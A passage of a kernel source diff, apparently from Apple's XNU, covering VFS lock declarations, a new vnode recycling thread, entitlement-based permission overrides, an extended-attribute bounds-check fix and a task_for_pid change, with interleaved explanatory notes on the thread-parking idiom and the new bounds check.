+static LCK_GRP_DECLARE(fs_klist_lck_grp, "fs_klist");
+static LCK_MTX_DECLARE(fs_klist_lock, &fs_klist_lck_grp);
 
 void
 vfs_event_init(void)
 {
        klist_init(&fs_klist);
-       fs_klist_lck_grp = lck_grp_alloc_init("fs_klist", NULL);
-       fs_klist_lock = lck_mtx_alloc_init(fs_klist_lck_grp, NULL);
 }
 
 void
@@ -4228,9 +4274,9 @@ vfs_event_signal(fsid_t *fsid, u_int32_t event, intptr_t data)
                }
        }
 
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
        KNOTE(&fs_klist, event);
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
 }
 
 /*
@@ -4615,9 +4661,9 @@ filt_fsattach(struct knote *kn, __unused struct kevent_qos_s *kev)
        kn->kn_flags |= EV_CLEAR; /* automatic */
        kn->kn_sdata = 0;         /* incoming data is ignored */
 
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
        KNOTE_ATTACH(&fs_klist, kn);
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
 
        /*
         * filter only sees future events,
@@ -4629,9 +4675,9 @@ filt_fsattach(struct knote *kn, __unused struct kevent_qos_s *kev)
 static void
 filt_fsdetach(struct knote *kn)
 {
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
        KNOTE_DETACH(&fs_klist, kn);
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
 }
 
 static int
@@ -4654,7 +4700,7 @@ filt_fstouch(struct knote *kn, struct kevent_qos_s *kev)
 {
        int res;
 
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
 
        kn->kn_sfflags = kev->fflags;
 
@@ -4670,7 +4716,7 @@ filt_fstouch(struct knote *kn, struct kevent_qos_s *kev)
        //      kn->kn_fflags &= kn->kn_sfflags;
        res = (kn->kn_fflags != 0);
 
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
 
        return res;
 }
@@ -4680,12 +4726,12 @@ filt_fsprocess(struct knote *kn, struct kevent_qos_s *kev)
 {
        int res = 0;
 
-       lck_mtx_lock(fs_klist_lock);
+       lck_mtx_lock(&fs_klist_lock);
        if (kn->kn_fflags) {
                knote_fill_kevent(kn, kev, 0);
                res = 1;
        }
-       lck_mtx_unlock(fs_klist_lock);
+       lck_mtx_unlock(&fs_klist_lock);
        return res;
 }
 
@@ -4781,7 +4827,8 @@ sysctl_vfs_generic_conf SYSCTL_HANDLER_ARGS
 }
 
 /* the vfs.generic. branch. */
-SYSCTL_NODE(_vfs, VFS_GENERIC, generic, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs generic hinge");
+SYSCTL_EXTENSIBLE_NODE(_vfs, VFS_GENERIC, generic,
+    CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs generic hinge");
 /* retreive a list of mounted filesystem fsid_t */
 SYSCTL_PROC(_vfs_generic, OID_AUTO, vfsidlist,
     CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_LOCKED,
@@ -4857,7 +4904,7 @@ long num_reusedvnodes = 0;
 
 
 static vnode_t
-process_vp(vnode_t vp, int want_vp, int *deferred)
+process_vp(vnode_t vp, int want_vp, bool can_defer, int *deferred)
 {
        unsigned int  vpid;
 
@@ -4916,7 +4963,7 @@ process_vp(vnode_t vp, int want_vp, int *deferred)
         * Checks for anyone racing us for recycle
         */
        if (vp->v_type != VBAD) {
-               if (want_vp && (vnode_on_reliable_media(vp) == FALSE || (vp->v_flag & VISDIRTY))) {
+               if ((want_vp || can_defer) && (vnode_on_reliable_media(vp) == FALSE || (vp->v_flag & VISDIRTY))) {
                        vnode_async_list_add(vp);
                        vnode_unlock(vp);
 
@@ -4979,7 +5026,7 @@ async_work_continue(void)
 
                vp = TAILQ_FIRST(q);
 
-               vp = process_vp(vp, 0, &deferred);
+               vp = process_vp(vp, 0, false, &deferred);
 
                if (vp != NULLVP) {
                        panic("found VBAD vp (%p) on async queue", vp);
@@ -4987,6 +5034,68 @@ async_work_continue(void)
        }
 }
 
+__attribute__((noreturn))
+static void
+vn_laundry_continue(void)
+{
+       struct freelst *free_q;
+       struct ragelst *rage_q;
+       int     deferred;
+       vnode_t vp;
+       bool rage_q_empty;
+       bool free_q_empty;
+
+
+       free_q = &vnode_free_list;
+       rage_q = &vnode_rage_list;
+
+       for (;;) {
+               vnode_list_lock();
+
+               free_q_empty = TAILQ_EMPTY(free_q);
+               rage_q_empty = TAILQ_EMPTY(rage_q);
+
+               if (!rage_q_empty && !free_q_empty) {
+                       struct timeval current_tv;
+
+                       microuptime(&current_tv);
+                       if (ragevnodes < rage_limit &&
+                           ((current_tv.tv_sec - rage_tv.tv_sec) < RAGE_TIME_LIMIT)) {
+                               rage_q_empty = true;
+                       }
+               }
+
+               if (deadvnodes >= deadvnodes_high ||
+                   (rage_q_empty && free_q_empty) ||
+                   numvnodes < desiredvnodes) {
+                       assert_wait(free_q, (THREAD_UNINT));
+
+                       vnode_list_unlock();
+
+                       thread_block((thread_continue_t)vn_laundry_continue);
+
+                       continue;
+               }
+
+               if (!rage_q_empty) {
+                       vp = TAILQ_FIRST(rage_q);
+               } else {
+                       vp = TAILQ_FIRST(free_q);
+               }
+
+               vp = process_vp(vp, 0, true, &deferred);
+       }
+}
+
+static inline void
+wakeup_laundry_thread()
+{
+       if ((deadvnodes < deadvnodes_low) &&
+           /* Minimum number of free vnodes the thread should act on */
+           ((freevnodes + ragevnodes) > 10)) {
+               wakeup(&vnode_free_list);
+       }
+}
 
 static int
 new_vnode(vnode_t *vpp)
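vn_laundry_continue() is a new worker that keeps the dead-vnode list stocked. vntblinit() sizes its watermarks (deadvnodes_low = desiredvnodes / 100, capped at 300, so on any configuration with desiredvnodes above 30,000 the low/high marks are simply 300 and 600), the thread parks with assert_wait()/thread_block() whenever both queues are empty, enough dead vnodes exist, or the table is still under its desiredvnodes budget, and wakeup_laundry_thread() kicks it by wakeup()ing the same channel once deadvnodes drops below the low mark. A sketch of that park/kick idiom; every name other than assert_wait, thread_block and wakeup is illustrative:

    static int example_pending;             /* illustrative count of queued work */

    __attribute__((noreturn))
    static void
    example_worker_continue(void)
    {
            for (;;) {
                    example_lock();         /* illustrative lock around the queue */
                    if (example_pending == 0) {
                            /* register on the channel before dropping the lock ... */
                            assert_wait(&example_pending, THREAD_UNINT);
                            example_unlock();
                            /* ... then park; we resume at the top of this continuation */
                            thread_block((thread_continue_t)example_worker_continue);
                            continue;
                    }
                    example_pending--;
                    example_unlock();
                    example_process_one();  /* illustrative work function */
            }
    }

    static void
    example_kick(void)
    {
            wakeup(&example_pending);       /* unparks a thread asserted on that channel */
    }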
@@ -5006,6 +5115,7 @@ retry:
        vp = NULLVP;
 
        vnode_list_lock();
+       newvnode++;
 
        if (need_reliable_vp == TRUE) {
                async_work_timed_out++;
@@ -5019,6 +5129,9 @@ retry:
                         * Can always reuse a dead one
                         */
                        vp = TAILQ_FIRST(&vnode_dead_list);
+                       if (numvnodes >= desiredvnodes) {
+                               wakeup_laundry_thread();
+                       }
                        goto steal_this_vp;
                }
                /*
@@ -5026,11 +5139,14 @@ retry:
                 * the limit, we'll create a new vnode
                 */
                numvnodes++;
+               if (numvnodes >= desiredvnodes) {
+                       wakeup_laundry_thread();
+               }
                vnode_list_unlock();
 
                vp = zalloc_flags(vnode_zone, Z_WAITOK | Z_ZERO);
                VLISTNONE(vp);          /* avoid double queue removal */
-               lck_mtx_init(&vp->v_lock, vnode_lck_grp, vnode_lck_attr);
+               lck_mtx_init(&vp->v_lock, &vnode_lck_grp, &vnode_lck_attr);
 
                TAILQ_INIT(&vp->v_ncchildren);
 
@@ -5048,6 +5164,9 @@ retry:
                vp->v_iocount = 1;
                goto done;
        }
+
+       wakeup_laundry_thread();
+
        microuptime(&current_tv);
 
 #define MAX_WALK_COUNT 1000
@@ -5060,16 +5179,6 @@ retry:
                                panic("new_vnode: vp (%p) on RAGE list not marked VLIST_RAGE", vp);
                        }
 
-                       /*
-                        * skip free vnodes created by bdevvp as they are
-                        * typically not fully constructedi and may have issues
-                        * in getting reclaimed.
-                        */
-                       if (vp->v_flag & VBDEVVP) {
-                               bdevvp_vnodes++;
-                               continue;
-                       }
-
                        // if we're a dependency-capable process, skip vnodes that can
                        // cause recycling deadlocks. (i.e. this process is diskimages
                        // helper and the vnode is in a disk image).  Querying the
@@ -5108,16 +5217,6 @@ retry:
                 */
                walk_count = 0;
                TAILQ_FOREACH(vp, &vnode_free_list, v_freelist) {
-                       /*
-                        * skip free vnodes created by bdevvp as they are
-                        * typically not fully constructedi and may have issues
-                        * in getting reclaimed.
-                        */
-                       if (vp->v_flag & VBDEVVP) {
-                               bdevvp_vnodes++;
-                               continue;
-                       }
-
                        // if we're a dependency-capable process, skip vnodes that can
                        // cause recycling deadlocks. (i.e. this process is diskimages
                        // helper and the vnode is in a disk image).  Querying the
@@ -5217,8 +5316,9 @@ retry:
                *vpp = NULL;
                return ENFILE;
        }
+       newvnode_nodead++;
 steal_this_vp:
-       if ((vp = process_vp(vp, 1, &deferred)) == NULLVP) {
+       if ((vp = process_vp(vp, 1, true, &deferred)) == NULLVP) {
                if (deferred) {
                        int     elapsed_msecs;
                        struct timeval elapsed_tv;
@@ -8006,6 +8106,14 @@ vnode_authorize_posix(vauth_ctx vcp, int action, int on_dir)
        }
        owner_ok = (needed & vap->va_mode) == needed;
 
+       /*
+        * Processes with the appropriate entitlement can mark themselves as
+        * ignoring file/directory permissions if they own it.
+        */
+       if (!owner_ok && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+               owner_ok = 1;
+       }
+
        /* group permissions */
        needed = 0;
        if (action & VREAD) {
@@ -8037,6 +8145,7 @@ vnode_authorize_posix(vauth_ctx vcp, int action, int on_dir)
                _SETWHERE("all");
                goto out;
        }
+
        if (!owner_ok && !group_ok && !world_ok) {
                _SETWHERE("all");
                error = EACCES;
@@ -8199,6 +8308,10 @@ vnode_authorize_delete(vauth_ctx vcp, boolean_t cached_delete_child)
 
                switch (eval.ae_result) {
                case KAUTH_RESULT_DENY:
+                       if (vauth_file_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+                               KAUTH_DEBUG("%p    Override DENY due to entitlement", vcp->vp);
+                               return 0;
+                       }
                        KAUTH_DEBUG("%p    DENIED - denied by ACL", vcp->vp);
                        return EACCES;
                case KAUTH_RESULT_ALLOW:
@@ -8267,6 +8380,10 @@ vnode_authorize_delete(vauth_ctx vcp, boolean_t cached_delete_child)
                }
                switch (eval.ae_result) {
                case KAUTH_RESULT_DENY:
+                       if (vauth_dir_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+                               KAUTH_DEBUG("%p    Override DENY due to entitlement", vcp->vp);
+                               return 0;
+                       }
                        KAUTH_DEBUG("%p    DENIED - denied by directory ACL", vcp->vp);
                        return EACCES;
                case KAUTH_RESULT_ALLOW:
@@ -8390,6 +8507,10 @@ vnode_authorize_simple(vauth_ctx vcp, kauth_ace_rights_t acl_rights, kauth_ace_r
 
                switch (eval.ae_result) {
                case KAUTH_RESULT_DENY:
+                       if (vauth_file_owner(vcp) && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+                               KAUTH_DEBUG("%p    Override DENY due to entitlement", vcp->vp);
+                               return 0;
+                       }
                        KAUTH_DEBUG("%p    DENIED - by ACL", vcp->vp);
                        return EACCES;         /* deny, deny, counter-allege */
                case KAUTH_RESULT_ALLOW:
@@ -8516,7 +8637,8 @@ vnode_authorize_simple(vauth_ctx vcp, kauth_ace_rights_t acl_rights, kauth_ace_r
  * Check for file immutability.
  */
 static int
-vnode_authorize_checkimmutable(mount_t mp, struct vnode_attr *vap, int rights, int ignore)
+vnode_authorize_checkimmutable(mount_t mp, vauth_ctx vcp,
+    struct vnode_attr *vap, int rights, int ignore)
 {
        int error;
        int append;
@@ -8569,6 +8691,22 @@ vnode_authorize_checkimmutable(mount_t mp, struct vnode_attr *vap, int rights, i
                        }
                }
                if ((error = vnode_immutable(vap, append, ignore)) != 0) {
+                       if (error && !ignore) {
+                               /*
+                                * In case of a rename, we want to check ownership for dvp as well.
+                                */
+                               int owner = 0;
+                               if (rights & KAUTH_VNODE_DELETE_CHILD && vcp->dvp != NULL) {
+                                       owner = vauth_file_owner(vcp) && vauth_dir_owner(vcp);
+                               } else {
+                                       owner = vauth_file_owner(vcp);
+                               }
+                               if (owner && proc_ignores_node_permissions(vfs_context_proc(vcp->ctx))) {
+                                       error = vnode_immutable(vap, append, 1);
+                               }
+                       }
+               }
+               if (error) {
                        KAUTH_DEBUG("%p    DENIED - file is immutable", vap);
                        goto out;
                }
@@ -8779,14 +8917,14 @@ vnode_attr_authorize_internal(vauth_ctx vcp, mount_t mp,
         * In the deletion case, parent directory immutability vetoes specific
         * file rights.
         */
-       if ((result = vnode_authorize_checkimmutable(mp, vcp->vap, rights,
+       if ((result = vnode_authorize_checkimmutable(mp, vcp, vcp->vap, rights,
            noimmutable)) != 0) {
                goto out;
        }
 
        if ((rights & KAUTH_VNODE_DELETE) &&
            !parent_authorized_for_delete_child) {
-               result = vnode_authorize_checkimmutable(mp, vcp->dvap,
+               result = vnode_authorize_checkimmutable(mp, vcp, vcp->dvap,
                    KAUTH_VNODE_DELETE_CHILD, 0);
                if (result) {
                        goto out;
@@ -10687,7 +10825,7 @@ vnode_resolver_create(mount_t mp, vnode_t vp, struct vnode_trigger_param *tinfo,
                return ENOMEM;
        }
 
-       lck_mtx_init(&rp->vr_lock, trigger_vnode_lck_grp, trigger_vnode_lck_attr);
+       lck_mtx_init(&rp->vr_lock, &trigger_vnode_lck_grp, &trigger_vnode_lck_attr);
 
        rp->vr_resolve_func = tinfo->vnt_resolve_func;
        rp->vr_unresolve_func = tinfo->vnt_unresolve_func;
@@ -10726,7 +10864,7 @@ vnode_resolver_release(vnode_resolve_t rp)
                rp->vr_reclaim_func(NULLVP, rp->vr_data);
        }
 
-       lck_mtx_destroy(&rp->vr_lock, trigger_vnode_lck_grp);
+       lck_mtx_destroy(&rp->vr_lock, &trigger_vnode_lck_grp);
        kheap_free(KHEAP_DEFAULT, rp, sizeof(struct vnode_resolve));
 }
 
index cb7cf97fddaf0d9a4fccb4207a305c7c9d775192..a1c721e9e709434382a7ca41b3ab80b5e5a55b61 100644 (file)
@@ -253,11 +253,14 @@ int sync_internal(void);
 __private_extern__
 int unlink1(vfs_context_t, vnode_t, user_addr_t, enum uio_seg, int);
 
-extern lck_grp_t *fd_vn_lck_grp;
-extern lck_grp_attr_t *fd_vn_lck_grp_attr;
-extern lck_attr_t *fd_vn_lck_attr;
+static LCK_GRP_DECLARE(fd_vn_lck_grp, "fd_vnode_data");
+static LCK_ATTR_DECLARE(fd_vn_lck_attr, 0, 0);
 
-extern lck_rw_t * rootvnode_rw_lock;
+/* vars for sync mutex */
+static LCK_GRP_DECLARE(sync_mtx_lck_grp, "sync thread");
+static LCK_MTX_DECLARE(sync_mtx_lck, &sync_mtx_lck_grp);
+
+extern lck_rw_t rootvnode_rw_lock;
 
 /*
  * incremented each time a mount or unmount operation occurs
@@ -859,6 +862,11 @@ mount_common(char *fstypename, vnode_t pvp, vnode_t vp,
        }
 #endif /* CONFIG_NFS_CLIENT || DEVFS */
 
+       if (KERNEL_MOUNT_DEVFS & internal_flags) {
+               // kernel mounted devfs
+               mp->mnt_kern_flag |= MNTK_SYSTEM;
+       }
+
 update:
 
        /*
@@ -2198,10 +2206,10 @@ checkdirs(vnode_t olddp, vfs_context_t ctx)
 
        if (rootvnode == olddp) {
                vnode_ref(newdp);
-               lck_rw_lock_exclusive(rootvnode_rw_lock);
+               lck_rw_lock_exclusive(&rootvnode_rw_lock);
                tvp = rootvnode;
                rootvnode = newdp;
-               lck_rw_unlock_exclusive(rootvnode_rw_lock);
+               lck_rw_unlock_exclusive(&rootvnode_rw_lock);
                vnode_rele(tvp);
        }
 
@@ -2317,6 +2325,10 @@ safedounmount(struct mount *mp, int flags, vfs_context_t ctx)
         * associated with it (for example, the associated VM or DATA mounts) .
         */
        if ((mp->mnt_flag & MNT_ROOTFS) || (mp->mnt_kern_flag & MNTK_SYSTEM)) {
+               if (!(mp->mnt_flag & MNT_ROOTFS)) {
+                       printf("attempt to unmount a system mount (%s), will return EBUSY\n",
+                           mp->mnt_vfsstat.f_mntonname);
+               }
                error = EBUSY; /* the root (or associated volumes) is always busy */
                goto out;
        }
@@ -2833,17 +2845,17 @@ sync_thread(__unused void *arg, __unused wait_result_t wr)
        pm_sync_thread = current_thread();
 #endif /* CONFIG_PHYS_WRITE_ACCT */
 
-       lck_mtx_lock(sync_mtx_lck);
+       lck_mtx_lock(&sync_mtx_lck);
        while (sync_thread_state & SYNC_THREAD_RUN) {
                sync_thread_state &= ~SYNC_THREAD_RUN;
-               lck_mtx_unlock(sync_mtx_lck);
+               lck_mtx_unlock(&sync_mtx_lck);
 
                sync_type = SYNC_ONLY_RELIABLE_MEDIA;
                vfs_iterate(LK_NOWAIT, sync_internal_callback, &sync_type);
                sync_type = SYNC_ONLY_UNRELIABLE_MEDIA;
                vfs_iterate(LK_NOWAIT, sync_internal_callback, &sync_type);
 
-               lck_mtx_lock(sync_mtx_lck);
+               lck_mtx_lock(&sync_mtx_lck);
        }
        /*
         * This wakeup _has_ to be issued before the lock is released otherwise
@@ -2856,7 +2868,7 @@ sync_thread(__unused void *arg, __unused wait_result_t wr)
 #if CONFIG_PHYS_WRITE_ACCT
        pm_sync_thread = NULL;
 #endif /* CONFIG_PHYS_WRITE_ACCT */
-       lck_mtx_unlock(sync_mtx_lck);
+       lck_mtx_unlock(&sync_mtx_lck);
 
        if (print_vmpage_stat) {
                vm_countdirtypages();
@@ -2883,7 +2895,7 @@ sync_internal(void)
        int thread_created = FALSE;
        struct timespec ts = {.tv_sec = sync_timeout_seconds, .tv_nsec = 0};
 
-       lck_mtx_lock(sync_mtx_lck);
+       lck_mtx_lock(&sync_mtx_lck);
        sync_thread_state |= SYNC_THREAD_RUN;
        if (!(sync_thread_state & SYNC_THREAD_RUNNING)) {
                int kr;
@@ -2892,14 +2904,14 @@ sync_internal(void)
                kr = kernel_thread_start(sync_thread, NULL, &thd);
                if (kr != KERN_SUCCESS) {
                        sync_thread_state &= ~SYNC_THREAD_RUNNING;
-                       lck_mtx_unlock(sync_mtx_lck);
+                       lck_mtx_unlock(&sync_mtx_lck);
                        printf("sync_thread failed\n");
                        return 0;
                }
                thread_created = TRUE;
        }
 
-       error = msleep((caddr_t)&sync_thread_state, sync_mtx_lck,
+       error = msleep((caddr_t)&sync_thread_state, &sync_mtx_lck,
            (PVFS | PDROP | PCATCH), "sync_thread", &ts);
        if (error) {
                struct timeval now;
@@ -4119,7 +4131,7 @@ fg_vn_data_alloc(void)
        /* Allocate per fd vnode data */
        fvdata = kheap_alloc(KM_FD_VN_DATA, sizeof(struct fd_vn_data),
            Z_WAITOK | Z_ZERO);
-       lck_mtx_init(&fvdata->fv_lock, fd_vn_lck_grp, fd_vn_lck_attr);
+       lck_mtx_init(&fvdata->fv_lock, &fd_vn_lck_grp, &fd_vn_lck_attr);
        return fvdata;
 }
 
@@ -4132,7 +4144,7 @@ fg_vn_data_free(void *fgvndata)
        struct fd_vn_data *fvdata = (struct fd_vn_data *)fgvndata;
 
        kheap_free(KHEAP_DATA_BUFFERS, fvdata->fv_buf, fvdata->fv_bufallocsiz);
-       lck_mtx_destroy(&fvdata->fv_lock, fd_vn_lck_grp);
+       lck_mtx_destroy(&fvdata->fv_lock, &fd_vn_lck_grp);
        kheap_free(KM_FD_VN_DATA, fvdata, sizeof(struct fd_vn_data));
 }
 
@@ -7990,14 +8002,14 @@ clonefile_internal(vnode_t fvp, boolean_t data_read_authorised, int dst_dirfd,
 
        /*
         * certain attributes may need to be changed from the source, we ask for
-        * those here.
+        * those here with the exception of the source file's ACL. The clone file
+        * will inherit the target directory's ACL.
         */
        VATTR_INIT(&va);
        VATTR_WANTED(&va, va_uid);
        VATTR_WANTED(&va, va_gid);
        VATTR_WANTED(&va, va_mode);
        VATTR_WANTED(&va, va_flags);
-       VATTR_WANTED(&va, va_acl);
 
        if ((error = vnode_getattr(fvp, &va, ctx)) != 0) {
                goto out;
@@ -8061,7 +8073,7 @@ clonefile_internal(vnode_t fvp, boolean_t data_read_authorised, int dst_dirfd,
                 * If some of the requested attributes weren't handled by the
                 * VNOP, use our fallback code.
                 */
-               if (!VATTR_ALL_SUPPORTED(&va)) {
+               if (!VATTR_ALL_SUPPORTED(&nva)) {
                        (void)vnode_setattr_fallback(tvp, &nva, ctx);
                }
 
@@ -10577,8 +10589,9 @@ static LIST_HEAD(nspace_resolver_requesthead,
 static u_long nspace_resolver_request_hashmask;
 static u_int nspace_resolver_request_count;
 static bool nspace_resolver_request_wait_slot;
-static lck_grp_t *nspace_resolver_request_lck_grp;
-static lck_mtx_t nspace_resolver_request_hash_mutex;
+static LCK_GRP_DECLARE(nspace_resolver_request_lck_grp, "file namespace resolver");
+static LCK_MTX_DECLARE(nspace_resolver_request_hash_mutex,
+    &nspace_resolver_request_lck_grp);
 
 #define NSPACE_REQ_LOCK() \
        lck_mtx_lock(&nspace_resolver_request_hash_mutex)
@@ -10886,60 +10899,6 @@ nspace_materialization_set_thread_state(int is_prevented)
        return 0;
 }
 
-static int
-nspace_materialization_is_prevented(void)
-{
-       proc_t p = current_proc();
-       uthread_t ut = (uthread_t)get_bsdthread_info(current_thread());
-       vfs_context_t ctx = vfs_context_current();
-
-       /*
-        * Kernel context ==> return EDEADLK, as we would with any random
-        * process decorated as no-materialize.
-        */
-       if (ctx == vfs_context_kernel()) {
-               return EDEADLK;
-       }
-
-       /*
-        * If the process has the dataless-manipulation entitlement,
-        * materialization is prevented, and depending on the kind
-        * of file system operation, things get to proceed as if the
-        * object is not dataless.
-        */
-       if (vfs_context_is_dataless_manipulator(ctx)) {
-               return EJUSTRETURN;
-       }
-
-       /*
-        * Per-thread decorations override any process-wide decorations.
-        * (Foundation uses this, and this overrides even the dataless-
-        * manipulation entitlement so as to make API contracts consistent.)
-        */
-       if (ut != NULL) {
-               if (ut->uu_flag & UT_NSPACE_NODATALESSFAULTS) {
-                       return EDEADLK;
-               }
-               if (ut->uu_flag & UT_NSPACE_FORCEDATALESSFAULTS) {
-                       return 0;
-               }
-       }
-
-       /*
-        * If the process's iopolicy specifies that dataless files
-        * can be materialized, then we let it go ahead.
-        */
-       if (p->p_vfs_iopolicy & P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES) {
-               return 0;
-       }
-
-       /*
-        * The default behavior is to not materialize dataless files;
-        * return to the caller that deadlock was detected.
-        */
-       return EDEADLK;
-}
-
 /* the vfs.nspace branch */
 SYSCTL_NODE(_vfs, OID_AUTO, nspace, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs nspace hinge");
 
@@ -11078,16 +11037,67 @@ SYSCTL_PROC(_vfs_nspace, OID_AUTO, complete,
 #define __no_dataless_unused    __unused
 #endif
 
-void
-nspace_resolver_init(void)
+int
+vfs_context_dataless_materialization_is_prevented(
+       vfs_context_t const ctx __no_dataless_unused)
 {
 #if CONFIG_DATALESS_FILES
-       nspace_resolver_request_lck_grp =
-           lck_grp_alloc_init("file namespace resolver", NULL);
+       proc_t const p = vfs_context_proc(ctx);
+       thread_t const t = vfs_context_thread(ctx);
+       uthread_t const ut = t ? get_bsdthread_info(t) : NULL;
+
+       /*
+        * Kernel context ==> return EDEADLK, as we would with any random
+        * process decorated as no-materialize.
+        */
+       if (ctx == vfs_context_kernel()) {
+               return EDEADLK;
+       }
+
+       /*
+        * If the process has the dataless-manipulation entitlement,
+        * materialization is prevented, and depending on the kind
+        * of file system operation, things get to proceed as if the
+        * object is not dataless.
+        */
+       if (vfs_context_is_dataless_manipulator(ctx)) {
+               return EJUSTRETURN;
+       }
+
+       /*
+        * Per-thread decorations override any process-wide decorations.
+        * (Foundation uses this, and this overrides even the dataless-
+        * manipulation entitlement so as to make API contracts consistent.)
+        */
+       if (ut != NULL) {
+               if (ut->uu_flag & UT_NSPACE_NODATALESSFAULTS) {
+                       return EDEADLK;
+               }
+               if (ut->uu_flag & UT_NSPACE_FORCEDATALESSFAULTS) {
+                       return 0;
+               }
+       }
 
-       lck_mtx_init(&nspace_resolver_request_hash_mutex,
-           nspace_resolver_request_lck_grp, NULL);
+       /*
+        * If the process's iopolicy specifies that dataless files
+        * can be materialized, then we let it go ahead.
+        */
+       if (p->p_vfs_iopolicy & P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES) {
+               return 0;
+       }
+#endif /* CONFIG_DATALESS_FILES */
 
+       /*
+        * The default behavior is to not materialize dataless files;
+        * return to the caller that deadlock was detected.
+        */
+       return EDEADLK;
+}
+
+void
+nspace_resolver_init(void)
+{
+#if CONFIG_DATALESS_FILES
        nspace_resolver_request_hashtbl =
            hashinit(NSPACE_RESOLVER_REQ_HASHSIZE,
            M_VNODE /* XXX */, &nspace_resolver_request_hashmask);
@@ -11186,7 +11196,8 @@ resolve_nspace_item_ext(
                return ENOTSUP;
        }
 
-       error = nspace_materialization_is_prevented();
+       error = vfs_context_dataless_materialization_is_prevented(
+               vfs_context_current());
        if (error) {
                os_log_debug(OS_LOG_DEFAULT,
                    "NSPACE process/thread is decorated as no-materialization");
index 0dfcf949f0f92ac2384c2d2efe4399082e1afc1c..8db2c859fa83f7ae1dfb947ba23bd15a0a2e3420 100644 (file)
@@ -3207,6 +3207,7 @@ check_and_swap_attrhdr(attr_header_t *ah, attr_info_t *ainfop)
         */
        end = ah->data_start + ah->data_length;
        if (ah->total_size > ainfop->finderinfo->offset + ainfop->finderinfo->length ||
+           ah->data_start < sizeof(attr_header_t) ||
            end < ah->data_start ||
            end > ah->total_size) {
                return EINVAL;
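The one-line change above tightens check_and_swap_attrhdr(): in addition to the existing overflow and end-of-range tests, the attribute data region must now begin at or beyond the fixed attr_header_t, so a header whose data_start points back into the header itself is rejected with EINVAL. The same test in isolation, with the sizes passed as parameters so the sketch stands alone:

    #include <stdint.h>

    /* illustrative standalone version of the bounds check */
    static int
    example_attr_bounds_ok(uint32_t data_start, uint32_t data_length,
        uint32_t total_size, uint32_t header_size)
    {
            uint32_t end = data_start + data_length;

            if (data_start < header_size ||     /* new: data may not overlap the fixed header */
                end < data_start ||             /* 32-bit wrap-around */
                end > total_size) {             /* data runs past the advertised size */
                    return 0;
            }
            return 1;
    }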
index 9421ee0f9655530125aeabfc02b06747f9b12bff..67aceb8d18ec4c589575a01831e590e8dc4fb731 100644 (file)
@@ -230,6 +230,13 @@ extern int cs_executable_wire;
 SYSCTL_INT(_vm, OID_AUTO, cs_executable_create_upl, CTLFLAG_RD | CTLFLAG_LOCKED, &cs_executable_create_upl, 0, "");
 SYSCTL_INT(_vm, OID_AUTO, cs_executable_wire, CTLFLAG_RD | CTLFLAG_LOCKED, &cs_executable_wire, 0, "");
 
+extern int apple_protect_pager_count;
+extern int apple_protect_pager_count_mapped;
+extern unsigned int apple_protect_pager_cache_limit;
+SYSCTL_INT(_vm, OID_AUTO, apple_protect_pager_count, CTLFLAG_RD | CTLFLAG_LOCKED, &apple_protect_pager_count, 0, "");
+SYSCTL_INT(_vm, OID_AUTO, apple_protect_pager_count_mapped, CTLFLAG_RD | CTLFLAG_LOCKED, &apple_protect_pager_count_mapped, 0, "");
+SYSCTL_UINT(_vm, OID_AUTO, apple_protect_pager_cache_limit, CTLFLAG_RW | CTLFLAG_LOCKED, &apple_protect_pager_cache_limit, 0, "");
+
 #if DEVELOPMENT || DEBUG
 extern int radar_20146450;
 SYSCTL_INT(_vm, OID_AUTO, radar_20146450, CTLFLAG_RW | CTLFLAG_LOCKED, &radar_20146450, 0, "");
@@ -316,7 +323,7 @@ SYSCTL_INT(_vm, OID_AUTO, vm_shadow_max_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &v
 SYSCTL_INT(_vm, OID_AUTO, vm_debug_events, CTLFLAG_RW | CTLFLAG_LOCKED, &vm_debug_events, 0, "");
 
 __attribute__((noinline)) int __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(
-       mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid);
+       mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid, mach_task_flavor_t flavor);
 /*
  * Sysctl's related to data/stack execution.  See osfmk/vm/vm_map.c
  */
@@ -844,9 +851,9 @@ out:
  */
 __attribute__((noinline)) int
 __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(
-       mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid)
+       mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid, mach_task_flavor_t flavor)
 {
-       return check_task_access(task_access_port, calling_pid, calling_gid, target_pid);
+       return check_task_access_with_flavor(task_access_port, calling_pid, calling_gid, target_pid, flavor);
 }
 
 /*
@@ -885,14 +892,14 @@ task_for_pid(
 
        /* Always check if pid == 0 */
        if (pid == 0) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
